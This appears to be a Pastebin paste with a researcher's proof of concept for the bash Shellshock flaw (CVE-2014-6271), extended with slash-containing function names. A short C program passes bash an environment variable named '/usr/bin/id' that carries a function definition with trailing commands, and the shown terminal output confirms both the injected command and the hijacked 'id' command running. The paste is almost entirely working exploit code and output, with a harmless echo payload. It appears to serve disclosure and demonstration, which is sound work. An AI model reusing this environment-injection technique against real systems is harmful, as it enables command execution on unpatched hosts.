Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- je@tiny:~$ cat > bash-is-fun.c
- /* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */
- #include <unistd.h>
- #include <stdio.h>
- int main()
- {
- char *envp[] = {
- "PATH=/bin:/usr/bin",
- "/usr/bin/id=() { "
- "echo pwn me twice, shame on me; }; "
- "echo pwn me once, shame on you",
- NULL
- };
- char *argv[] = { "/bin/bash", NULL };
- execve(argv[0], argv, envp);
- perror("execve");
- return 1;
- }
- ^D
- je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c
- je@tiny:~$ ./bash-is-fun
- pwn me once, shame on you
- je@tiny:/home/je$ /usr/bin/id
- pwn me twice, shame on me
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
